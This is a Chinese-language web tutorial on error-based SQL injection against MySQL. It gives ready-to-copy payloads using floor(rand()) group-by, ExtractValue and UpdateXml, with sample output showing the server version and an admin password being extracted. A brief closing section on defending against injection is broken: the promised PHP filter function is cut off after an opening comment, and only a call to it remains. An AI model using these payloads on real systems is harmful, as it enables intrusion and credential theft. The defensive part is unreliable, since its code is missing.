1、通過floor報錯
可以通過如下一些利用代碼
代碼如下 復制代碼and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)));
舉例如下:
首先進行正常查詢:
mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
| 1 | test | do it |
+----+-------+---------+
假如id輸入存在注入的話,可以通過如下語句進行報錯。
代碼如下 復制代碼mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'
可以看到成功爆出了Mysql的版本,如果需要查詢其他數據,可以通過修改version()所在位置語句進行查詢。
例如我們需要查詢管理員用戶名和密碼:
Method1:
mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
Method2:
mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
2、ExtractValue
測試語句如下
代碼如下 復制代碼and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));
實際測試過程
代碼如下 復制代碼mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));--
ERROR 1105 (HY000): XPATH syntax error: 'admin888'
3、UpdateXml
測試語句
代碼如下 復制代碼and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))
實際測試過程
代碼如下 復制代碼mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,(select pass from admin limit 1),0x5e24),1));
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'
上面人方法有一個特點就是查詢語句很很長我們可以限制輸入長度,這也可以有效的過濾不過sql注入了,下面我來給大家分享一個防sql注入函數。
1.函數的構建
代碼如下 復制代碼 /*
2.函數的使用實例
<?php
if (inject_check($_GET['id']))
{
exit('你提交的數據非法,請檢查後重新提交!');
}
else
{
$id = $_GET['id'];
//處理數據………………
}
?>
更多關於sql防注入的確php教程我們可參考http://www.111cn.net/phper/phpanqn/37379.htm